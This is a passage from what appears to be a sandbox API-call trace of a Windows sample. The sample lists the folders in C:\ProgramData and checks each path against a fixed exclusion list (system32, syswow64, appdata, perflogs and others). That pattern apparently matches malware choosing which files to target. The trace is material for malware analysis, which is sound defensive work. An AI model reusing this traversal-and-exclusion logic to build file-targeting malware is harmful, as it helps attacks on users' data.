StrCmpW (psz1="..", psz2="..") returned 0 [0128.948] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x450f4738, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x4511a9a6, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x4511a9a6, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0128.948] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0128.948] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0128.948] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.948] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.948] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Adobe", cchMax=1054 | out: psz1="C:\\ProgramData\\Adobe") returned="C:\\ProgramData\\Adobe" [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\local\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\boot\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\perflogs\\") returned 0x0 [0128.948] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Adobe" [0128.948] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0128.948] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0128.948] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0128.949] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0128.949] StrCmpW (psz1="Comms", psz2=".") returned 1 [0128.949] StrCmpW (psz1="Comms", psz2="..") returned 1 [0128.949] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.949] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.949] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Comms", cchMax=1054 | out: psz1="C:\\ProgramData\\Comms") returned="C:\\ProgramData\\Comms" [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\system32\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\system\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\local\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\boot\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\perflogs\\") returned 0x0 [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Comms" [0128.949] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0128.949] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0128.949] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0128.949] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0128.949] StrCmpW (psz1="Documents", psz2=".") returned 1 [0128.949] StrCmpW (psz1="Documents", psz2="..") returned 1 [0128.949] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0128.949] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0128.949] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0128.949] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ecd6462, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3ecd6462, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3ecd6462, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0128.949] StrCmpW (psz1="Microsoft OneDrive", psz2=".") returned 1 [0128.949] StrCmpW (psz1="Microsoft OneDrive", psz2="..") returned 1 [0128.949] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.949] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.949] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Microsoft OneDrive", cchMax=1054 | out: psz1="C:\\ProgramData\\Microsoft OneDrive") returned="C:\\ProgramData\\Microsoft OneDrive" [0128.949] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\system32\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\system\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\local\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\boot\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\perflogs\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Microsoft OneDrive" [0128.950] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa2d56a03, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa2d56a03, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa2d56a03, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0128.950] StrCmpW (psz1="Oracle", psz2=".") returned 1 [0128.950] StrCmpW (psz1="Oracle", psz2="..") returned 1 [0128.950] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.950] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.950] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Oracle", cchMax=1054 | out: psz1="C:\\ProgramData\\Oracle") returned="C:\\ProgramData\\Oracle" [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\system32\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\system\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\local\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\boot\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\perflogs\\") returned 0x0 [0128.950] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Oracle" [0128.950] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcf03b3d5, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xdefc9a0c, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xdefc9a0c, ftLastWriteTime.dwHighDateTime=0x1d327b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0128.950] StrCmpW (psz1="Package Cache", psz2=".") returned 1 [0128.950] StrCmpW (psz1="Package Cache", psz2="..") returned 1 [0128.950] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.950] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.951] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Package Cache", cchMax=1054 | out: psz1="C:\\ProgramData\\Package Cache") returned="C:\\ProgramData\\Package Cache" [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\system32\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\system\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\local\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\boot\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\perflogs\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Package Cache" [0128.951] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17d079d0, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3122174, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x53fba98c, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0128.951] StrCmpW (psz1="regid.1991-06.com.microsoft", psz2=".") returned 1 [0128.951] StrCmpW (psz1="regid.1991-06.com.microsoft", psz2="..") returned 1 [0128.951] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.951] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.951] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="regid.1991-06.com.microsoft", cchMax=1054 | out: psz1="C:\\ProgramData\\regid.1991-06.com.microsoft") returned="C:\\ProgramData\\regid.1991-06.com.microsoft" [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\local\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\boot\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\perflogs\\") returned 0x0 [0128.951] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\programdata\\") returned=":\\ProgramData\\regid.1991-06.com.microsoft" [0128.951] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc31230fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1 [0128.951] StrCmpW (psz1="SoftwareDistribution", psz2=".") returned 1 [0128.952] StrCmpW (psz1="SoftwareDistribution", psz2="..") returned 1 [0128.952] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.952] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.952] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="SoftwareDistribution", cchMax=1054 | out: psz1="C:\\ProgramData\\SoftwareDistribution") returned="C:\\ProgramData\\SoftwareDistribution" [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\system32\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\system\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\local\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\boot\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\perflogs\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\programdata\\") returned=":\\ProgramData\\SoftwareDistribution" [0128.952] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x7877b7ce, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x7877b7ce, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7877b7ce, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0128.952] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0128.952] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0128.952] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x7877b7ce, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x7877b7ce, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7877b7ce, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0128.952] StrCmpW (psz1="Templates", psz2=".") returned 1 [0128.952] StrCmpW (psz1="Templates", psz2="..") returned 1 [0128.952] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1931975, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x1931975, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOPrivate", cAlternateFileName="USOPRI~1")) returned 1 [0128.952] StrCmpW (psz1="USOPrivate", psz2=".") returned 1 [0128.952] StrCmpW (psz1="USOPrivate", psz2="..") returned 1 [0128.952] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.952] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.952] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="USOPrivate", cchMax=1054 | out: psz1="C:\\ProgramData\\USOPrivate") returned="C:\\ProgramData\\USOPrivate" [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\system32\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\system\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.952] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\local\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\boot\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\perflogs\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\programdata\\") returned=":\\ProgramData\\USOPrivate" [0128.953] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ade3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa4ade3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa4ade3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 1 [0128.953] StrCmpW (psz1="USOShared", psz2=".") returned 1 [0128.953] StrCmpW (psz1="USOShared", psz2="..") returned 1 [0128.953] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0128.953] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0128.953] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="USOShared", cchMax=1054 | out: psz1="C:\\ProgramData\\USOShared") returned="C:\\ProgramData\\USOShared" [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\system32\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\system\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\local\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\boot\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\perflogs\\") returned 0x0 [0128.953] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\programdata\\") returned=":\\ProgramData\\USOShared" [0128.953] FindNextFileW (in: 